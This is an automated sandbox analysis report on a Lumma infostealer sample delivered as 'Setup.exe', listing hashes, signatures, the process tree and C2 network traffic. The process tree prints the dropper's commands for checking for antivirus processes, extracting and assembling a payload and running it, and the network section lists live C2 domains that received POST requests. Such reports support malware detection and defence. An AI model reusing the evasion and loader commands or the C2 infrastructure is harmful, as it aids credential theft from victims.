Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17/01/2025, 14:28 UTC

General

  • Target

    Setup.exe

  • Size

    1.1MB

  • MD5

    d630944d759e73848965cf7dbd9c89e3

  • SHA1

    4f91c583c9961c9c891d2fb63d3a709b41fe97f0

  • SHA256

    bceb986397dc19b258f4be0fd2559d67b10875430b31296e263e05ee3b9a0247

  • SHA512

    63b9f74815d869d6ca86989e5be9d4ac4aad88773c217d33465de2b756453f03c000bd200b3691e4e3fdf4cbd3cea55cd96ad626a347ff451a71e44d650a99c5

  • SSDEEP

    24576:jjBtLjvnr3blqsEQHKD+fFJy9jAeEaNPqUEE1FCrhiO1x53w3:vPv3bHfzyJAw7ERF3w3

Score
10/10

Malware Config

Extracted

Family

lumma

C2

https://twigbestug.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Aurora Aurora.cmd & Aurora.cmd
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2308
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2296
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2248
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 740515
        3⤵
        • System Location Discovery: System Language Discovery
        PID:284
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E Barbara
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2456
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "learned" Valley
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2648
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b 740515\Faq.com + Landing + Viral + Grenada + Jake + Master + Booty + Responding + Supports + Listing 740515\Faq.com
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2764
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Ages + ..\Folder + ..\Postposted + ..\Involves + ..\Styles + ..\Safe + ..\Completion b
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2656
      • C:\Users\Admin\AppData\Local\Temp\740515\Faq.com
        Faq.com b
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2236
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2544

Network

  • flag-us
    DNS
    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ
    IN A
    Response
  • flag-us
    DNS
    twigbestug.shop
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    twigbestug.shop
    IN A
    Response
    twigbestug.shop
    IN A
    104.21.36.233
    twigbestug.shop
    IN A
    172.67.200.205
  • flag-us
    POST
    https://twigbestug.shop/api
    Faq.com
    Remote address:
    104.21.36.233:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: twigbestug.shop
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=rkmbro0b6qesfc9k4j0a4ohsav; expires=Tue, 13 May 2025 08:16:24 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnNrXJ1rFBUyEiCYotTSubR2bzcmvBhvqS130IBYEKvCowNe5mfM0u5C%2FymDqJp2Fa19ZD7Xx6ckyfuUremLLqba1%2BL%2F%2Fj%2B4lKx%2BY7u%2F3wl%2BWGzU3kzDmAHkeTlBU8JGeWQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a104a9b887f-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=36298&min_rtt=26410&rtt_var=25050&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=583&delivery_rate=130803&cwnd=253&unsent_bytes=0&cid=ed873a69645a6a9d&ts=335&x=0"
  • flag-us
    DNS
    strivehelpeu.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    strivehelpeu.bond
    IN A
    Response
    strivehelpeu.bond
    IN A
    104.21.49.103
    strivehelpeu.bond
    IN A
    172.67.161.160
  • flag-us
    POST
    https://strivehelpeu.bond/api
    Faq.com
    Remote address:
    104.21.49.103:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: strivehelpeu.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=ccvb86265e5vaduho0de8kbog6; expires=Tue, 13 May 2025 08:16:25 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WU%2B0%2BUwKV%2FIl4inqvqGpSMZuYUNb4VF9l6YvtQQ3ibdn2dgwkvFNrT4dSfnHVgMlpvMsM8lelH8p8lBfdQvQup7rcs9Pn55xwrMHtdecLHjKSpK74Wuq6fE%2Fk6Atfbf%2BTvzndA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1278a6ef58-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27246&min_rtt=26063&rtt_var=7345&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=136487&cwnd=253&unsent_bytes=0&cid=526a19886cc0cf55&ts=525&x=0"
  • flag-us
    DNS
    crookedfoshe.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    crookedfoshe.bond
    IN A
    Response
    crookedfoshe.bond
    IN A
    104.21.16.1
    crookedfoshe.bond
    IN A
    104.21.80.1
    crookedfoshe.bond
    IN A
    104.21.64.1
    crookedfoshe.bond
    IN A
    104.21.48.1
    crookedfoshe.bond
    IN A
    104.21.96.1
    crookedfoshe.bond
    IN A
    104.21.112.1
    crookedfoshe.bond
    IN A
    104.21.32.1
  • flag-us
    POST
    https://crookedfoshe.bond/api
    Faq.com
    Remote address:
    104.21.16.1:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: crookedfoshe.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=vlhsupcmtq8up0bb3gbdfi5qpa; expires=Tue, 13 May 2025 08:16:25 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwHL0Ha3ZqYMTSh8Rm3AbuyPbQDBBG7nGlAX%2FCQCWASK6%2BwD%2FkUs9flJiQwTgTGbbkxrLhKo9Yq0MsbU7YXDrSBRlAh5ejkp19oj0Fr8byCNC%2FYnr4H3h1FeQthd6O7Vd2YL7g%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a165f48ecff-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27155&min_rtt=26075&rtt_var=7367&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=585&delivery_rate=133113&cwnd=253&unsent_bytes=0&cid=3d413894ae8fc164&ts=254&x=0"
  • flag-us
    DNS
    immolatechallen.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    immolatechallen.bond
    IN A
    Response
    immolatechallen.bond
    IN A
    172.67.185.74
    immolatechallen.bond
    IN A
    104.21.32.87
  • flag-us
    POST
    https://immolatechallen.bond/api
    Faq.com
    Remote address:
    172.67.185.74:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: immolatechallen.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=439cisece6dhntb4g5b81nr93e; expires=Tue, 13 May 2025 08:16:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8yOYU%2BlsFE%2B5ZiUg0O5u1aPndS0nNmjT%2BpPG9JJO5mGUCwtP503yX6t5wEJ8NnkXTCBhJSV5WeYF1XhhR4au%2BGGUCbNEsqsewUTm8idAyvBPr0EYYGRX934SEv6lozEKSA4U0Pz3kA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a189e3c94ab-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27450&min_rtt=26360&rtt_var=7394&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2871&recv_bytes=588&delivery_rate=132995&cwnd=236&unsent_bytes=0&cid=0d01242d532a33b8&ts=263&x=0"
  • flag-us
    DNS
    stripedre-lot.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    stripedre-lot.bond
    IN A
    Response
    stripedre-lot.bond
    IN A
    104.21.55.3
    stripedre-lot.bond
    IN A
    172.67.143.194
  • flag-us
    POST
    https://stripedre-lot.bond/api
    Faq.com
    Remote address:
    104.21.55.3:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: stripedre-lot.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=o9qbgtfht4r31uu5i50n8t7l8c; expires=Tue, 13 May 2025 08:16:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OE18f9Y2DdV44yZ26jWqPTnIVE0btfvRtEMKByOLDH7e9k4lFCdVj9v5q6LsCwzUOpajzhylPHAUUKGFWBpMgYB21yS91DhiNxk8U4O5mOPXwTC4D8nm26iIvR9Dwe51TXD7yh0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1ac8fbcd7e-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27497&min_rtt=26410&rtt_var=7336&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=586&delivery_rate=132974&cwnd=253&unsent_bytes=0&cid=363b1c4294cd79ea&ts=281&x=0"
  • flag-us
    DNS
    growthselec.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    growthselec.bond
    IN A
    Response
    growthselec.bond
    IN A
    104.21.96.1
    growthselec.bond
    IN A
    104.21.16.1
    growthselec.bond
    IN A
    104.21.48.1
    growthselec.bond
    IN A
    104.21.32.1
    growthselec.bond
    IN A
    104.21.80.1
    growthselec.bond
    IN A
    104.21.64.1
    growthselec.bond
    IN A
    104.21.112.1
  • flag-us
    POST
    https://growthselec.bond/api
    Faq.com
    Remote address:
    104.21.96.1:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: growthselec.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=sro9ahtq5o6m5jen3j6aaivl08; expires=Tue, 13 May 2025 08:16:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZznTtS5Y9YCVjsep%2FsrpYAV9t7buLIhPoD7FaYFpSiBazC%2FLXnllbQ6P%2BTQvc4V809ZmuJWpo6scRjzfOFmlGeNNcTiNKJhdYFDTQiAsb4iSAfosA6VH0mwryXwZL9HeWM2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1d3a836364-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27697&min_rtt=26455&rtt_var=7438&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=133760&cwnd=253&unsent_bytes=0&cid=450b7dd4b67735d5&ts=268&x=0"
  • flag-us
    DNS
    jarry-deatile.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    jarry-deatile.bond
    IN A
    Response
    jarry-deatile.bond
    IN A
    172.67.151.242
    jarry-deatile.bond
    IN A
    104.21.40.131
  • flag-us
    POST
    https://jarry-deatile.bond/api
    Faq.com
    Remote address:
    172.67.151.242:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: jarry-deatile.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:30:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=8v05dg8vi0e488u5kqu7uep8fg; expires=Tue, 13 May 2025 08:16:46 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXt6VMlzsWAztwXiJe7BDHEMXx121eWvQlx3chP%2B08rg94r494uTFRkiZSqd3OtUpArOXhYHg3rSqXbGXrUFCtU9GcKh4onsP4ufMJMF3%2BpNN9jsWLzqRuE5CC8liJkpik3AiEc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1f7ea3777f-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27374&min_rtt=26355&rtt_var=7315&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=586&delivery_rate=134241&cwnd=253&unsent_bytes=0&cid=b8b85f41bb65b2c0&ts=19951&x=0"
  • flag-us
    DNS
    pain-temper.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    pain-temper.bond
    IN A
    Response
    pain-temper.bond
    IN A
    172.67.140.28
    pain-temper.bond
    IN A
    104.21.73.40
  • flag-us
    POST
    https://pain-temper.bond/api
    Faq.com
    Remote address:
    172.67.140.28:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: pain-temper.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:30:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=hhg3u8nljfpf997bfjagivj0df; expires=Tue, 13 May 2025 08:16:47 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYnDkvTwo01%2BW62LWA%2BgdHxq6dTu1ISi2nIka%2BO%2F9hCSP%2FyVFPsfcg4rVKrIwIhdAboB8njnBerhOpr8JP1sFPhGpBDB%2FVShOckNrBtuyqCLG0iV7nJgE9nxNG%2Biqf4fMkLg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a9cabc093ed-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27761&min_rtt=26556&rtt_var=7747&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=132895&cwnd=253&unsent_bytes=0&cid=3b191eb120b21022&ts=290&x=0"
  • flag-us
    DNS
    jarry-fixxer.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    jarry-fixxer.bond
    IN A
    Response
    jarry-fixxer.bond
    IN A
    104.21.78.5
    jarry-fixxer.bond
    IN A
    172.67.214.67
  • flag-us
    POST
    https://jarry-fixxer.bond/api
    Faq.com
    Remote address:
    104.21.78.5:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: jarry-fixxer.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:30:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=10rokp9c4akuo15rsogjroapra; expires=Tue, 13 May 2025 08:16:47 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CI9%2F5%2B1HncbCEkGbERe4%2FfPF6cl%2BlRXlMCTOECosSg382CzLQjih0g9aYjExbLbbtFPp7eWe8NbVZ3rPfTsPy5AdJ0mhwVX%2BLV4JuapbeKYXw6j%2BAkJECWao5D0tpNWJoGefyA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a9f0c344916-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27477&min_rtt=26411&rtt_var=7351&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=134121&cwnd=253&unsent_bytes=0&cid=836fe19478e693b8&ts=286&x=0"
  • flag-us
    DNS
    steamcommunity.com
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    steamcommunity.com
    IN A
    Response
    steamcommunity.com
    IN A
    104.85.37.68
  • flag-fr
    GET
    https://steamcommunity.com/profiles/76561199724331900
    Faq.com
    Remote address:
    104.85.37.68:443
    Request
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Fri, 17 Jan 2025 14:30:09 GMT
    Content-Length: 35603
    Connection: keep-alive
    Set-Cookie: sessionid=08d1896e8e74a5f32fad25ec; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
  • flag-us
    DNS
    nikolay-romanov.su
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    nikolay-romanov.su
    IN A
    Response
  • 104.21.36.233:443
    https://twigbestug.shop/api
    tls, http
    Faq.com
    979 B
    4.5kB
    9
    9

    HTTP Request

    POST https://twigbestug.shop/api

    HTTP Response

    200
  • 104.21.49.103:443
    https://strivehelpeu.bond/api
    tls, http
    Faq.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://strivehelpeu.bond/api

    HTTP Response

    200
  • 104.21.16.1:443
    https://crookedfoshe.bond/api
    tls, http
    Faq.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://crookedfoshe.bond/api

    HTTP Response

    200
  • 172.67.185.74:443
    https://immolatechallen.bond/api
    tls, http
    Faq.com
    984 B
    4.5kB
    9
    9

    HTTP Request

    POST https://immolatechallen.bond/api

    HTTP Response

    200
  • 104.21.55.3:443
    https://stripedre-lot.bond/api
    tls, http
    Faq.com
    982 B
    4.4kB
    9
    9

    HTTP Request

    POST https://stripedre-lot.bond/api

    HTTP Response

    200
  • 104.21.96.1:443
    https://growthselec.bond/api
    tls, http
    Faq.com
    980 B
    4.4kB
    9
    9

    HTTP Request

    POST https://growthselec.bond/api

    HTTP Response

    200
  • 172.67.151.242:443
    https://jarry-deatile.bond/api
    tls, http
    Faq.com
    982 B
    4.5kB
    9
    9

    HTTP Request

    POST https://jarry-deatile.bond/api

    HTTP Response

    200
  • 172.67.140.28:443
    https://pain-temper.bond/api
    tls, http
    Faq.com
    980 B
    4.5kB
    9
    9

    HTTP Request

    POST https://pain-temper.bond/api

    HTTP Response

    200
  • 104.21.78.5:443
    https://jarry-fixxer.bond/api
    tls, http
    Faq.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://jarry-fixxer.bond/api

    HTTP Response

    200
  • 104.85.37.68:443
    https://steamcommunity.com/profiles/76561199724331900
    tls, http
    Faq.com
    1.5kB
    42.9kB
    23
    36

    HTTP Request

    GET https://steamcommunity.com/profiles/76561199724331900

    HTTP Response

    200
  • 8.8.8.8:53
    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ
    dns
    Faq.com
    79 B
    154 B
    1
    1

    DNS Request

    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ

  • 8.8.8.8:53
    twigbestug.shop
    dns
    Faq.com
    61 B
    93 B
    1
    1

    DNS Request

    twigbestug.shop

    DNS Response

    104.21.36.233
    172.67.200.205

  • 8.8.8.8:53
    strivehelpeu.bond
    dns
    Faq.com
    63 B
    95 B
    1
    1

    DNS Request

    strivehelpeu.bond

    DNS Response

    104.21.49.103
    172.67.161.160

  • 8.8.8.8:53
    crookedfoshe.bond
    dns
    Faq.com
    63 B
    175 B
    1
    1

    DNS Request

    crookedfoshe.bond

    DNS Response

    104.21.16.1
    104.21.80.1
    104.21.64.1
    104.21.48.1
    104.21.96.1
    104.21.112.1
    104.21.32.1

  • 8.8.8.8:53
    immolatechallen.bond
    dns
    Faq.com
    66 B
    98 B
    1
    1

    DNS Request

    immolatechallen.bond

    DNS Response

    172.67.185.74
